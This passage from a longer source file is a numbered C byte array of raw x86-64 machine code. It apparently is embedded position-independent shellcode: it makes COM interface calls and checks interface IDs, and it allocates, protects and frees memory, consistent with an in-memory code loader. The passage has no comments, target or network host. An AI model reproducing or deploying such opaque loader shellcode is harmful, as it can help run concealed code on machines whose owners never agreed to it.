699 0x55, 0xd8, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xc8, 0xff, 0xd0,
700 0x89, 0x45, 0xec, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x00, 0x48, 0x8b,
701 0x40, 0x10, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
702 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
703 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
704 0x8b, 0x80, 0x30, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10,
705 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48,
706 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0xba, 0x00,
707 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x69, 0x18, 0x00, 0x00, 0x48,
708 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x4d, 0xf0, 0x41,
709 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
710 0x90, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30,
711 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
712 0x89, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00,
713 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
714 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
715 0x00, 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
716 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
717 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
718 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
719 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01,
720 0x48, 0x01, 0xd2, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00,
721 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
722 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xa0, 0x01, 0x00, 0x00,
723 0x00, 0x0f, 0x84, 0x78, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
724 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00,
725 0x00, 0x48, 0x8b, 0x92, 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89,
726 0xd0, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
727 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x95, 0xa0,
728 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff,
729 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00,
730 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, 0x00,
731 0x48, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01,
732 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00,
733 0xe8, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85,
734 0x38, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48,
735 0x83, 0xc0, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00,
736 0x00, 0xe8, 0xc8, 0x06, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x01, 0x00,
737 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00,
738 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
739 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00,
740 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x59, 0x02,
741 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
742 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x4c,
743 0x8d, 0x82, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
744 0x00, 0x48, 0x8d, 0x8a, 0x7c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x80,
745 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41,
746 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
747 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00,
748 0x00, 0x0f, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
749 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x95, 0xc0,
750 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x04, 0x00, 0x00, 0x48, 0x8b,
751 0x8d, 0x80, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x88, 0x01, 0x00, 0x00,
752 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
753 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
754 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48,
755 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89,
756 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00,
757 0x0f, 0x85, 0x47, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
758 0x00, 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
759 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b,
760 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x20, 0x01, 0x00, 0x00,
761 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
762 0x00, 0x00, 0x00, 0x0f, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
763 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48,
764 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x03, 0x00,
765 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x01, 0x00,
766 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
767 0x8b, 0x40, 0x40, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b,
768 0x95, 0x90, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x02, 0x00, 0x00, 0x00, 0xff,
769 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
770 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
771 0x90, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0xbd, 0x9c,
772 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8f, 0x00, 0x00, 0x00, 0x48, 0x8b,
773 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x28,
774 0x48, 0x8b, 0x8d, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01,
775 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48,
776 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
777 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00,
778 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
779 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
780 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01,
781 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x75, 0x22, 0x48,
782 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
783 0x28, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00,
784 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
785 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48,
786 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
787 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
788 0x38, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
789 0xd0, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
790 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89,
791 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
792 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x8d, 0x14,
793 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba,
794 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x14, 0x00, 0x00,
795 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48,
796 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
797 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x90, 0x48, 0x81, 0xc4, 0x30,
798 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
799 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
800 0x18, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00,
801 0x48, 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b,
802 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x69, 0x01, 0x00, 0x00,
803 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
804 0x8d, 0x15, 0x91, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b,
805 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf3, 0x02, 0x00, 0x00,
806 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
807 0x8d, 0x15, 0xae, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b,
808 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x08, 0x03, 0x00, 0x00,
809 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
810 0x8d, 0x15, 0x09, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b,
811 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x0e, 0x03, 0x00, 0x00,
812 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
813 0x8d, 0x15, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b,
814 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xfc, 0x02, 0x00, 0x00,
815 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
816 0x8d, 0x15, 0xf9, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b,
817 0x45, 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
818 0xf8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x50, 0x90, 0x48, 0x83,
819 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
820 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
821 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20,
822 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75, 0x48, 0x8b,
823 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xfc, 0x03, 0x00,
824 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
825 0x89, 0xc2, 0xe8, 0x85, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48,
826 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xac, 0x04,
827 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00,
828 0x48, 0x89, 0xc2, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1b,
829 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0x48,
830 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
831 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
832 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x30, 0x5d,
833 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
834 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
835 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
836 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b,
837 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55,
838 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
839 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48,
840 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x55, 0xe8, 0xb8,
841 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f,
842 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x48, 0x83,
843 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
844 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
845 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
846 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x83,
847 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x70,
848 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48,
849 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x52, 0x28, 0x48,
850 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x50, 0x28,
851 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xe0,
852 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07,
853 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d, 0x48, 0x8b, 0x45, 0xf8, 0x48,
854 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48,
855 0x83, 0xc2, 0x18, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8,
856 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, 0xb8,
857 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48,
858 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
859 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa8,
860 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x48,
861 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
862 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x26, 0x11, 0x00, 0x00, 0x48, 0x8b,
863 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x55,
864 0xb0, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d,
865 0xfc, 0x00, 0x75, 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48,
866 0x8b, 0x40, 0x20, 0x4c, 0x8d, 0x4d, 0xa4, 0x4c, 0x8d, 0x45, 0xa8, 0x48,
867 0x8d, 0x55, 0xac, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc,
868 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55,
869 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48,
870 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48,
871 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x40, 0x78, 0xff,
872 0xd0, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x89, 0x10, 0xb8, 0x00, 0x00,
873 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
874 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00,
875 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
876 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x00, 0x00, 0x00, 0x00,
877 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
878 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
879 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55,
880 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00,
881 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89,
882 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
883 0x00, 0x48, 0x8d, 0x15, 0xb2, 0x02, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48,
884 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5d, 0x03, 0x00,
885 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
886 0x48, 0x8d, 0x15, 0x7d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
887 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa4, 0x03, 0x00,
888 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
889 0x48, 0x8d, 0x15, 0xbd, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48,
890 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x06, 0x04, 0x00,
891 0x00, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
892 0x48, 0x8d, 0x15, 0x37, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
893 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x99, 0x04, 0x00,
894 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
895 0x48, 0x8d, 0x15, 0x9a, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48,
896 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9b, 0x04, 0x00,
897 0x00, 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
898 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
899 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9d, 0x04, 0x00,
900 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
901 0x48, 0x8d, 0x15, 0x9e, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x60, 0x48,
902 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa1, 0x04, 0x00,
903 0x00, 0x48, 0x89, 0x50, 0x68, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
904 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
905 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00,
906 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
907 0x48, 0x8d, 0x15, 0xd5, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x80, 0x00,
908 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
909 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
910 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd1, 0x04, 0x00,
911 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
912 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xcf, 0x04, 0x00, 0x00, 0x48, 0x89,
913 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
914 0x48, 0x8d, 0x15, 0xcd, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00,
915 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
916 0xca, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48,
917 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd0, 0x04, 0x00,
918 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
919 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xce, 0x04, 0x00, 0x00, 0x48, 0x89,
920 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
921 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00,
922 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
923 0xd2, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48,
924 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00,
925 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
926 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xec, 0x04, 0x00, 0x00, 0x48, 0x89,
927 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
928 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00,
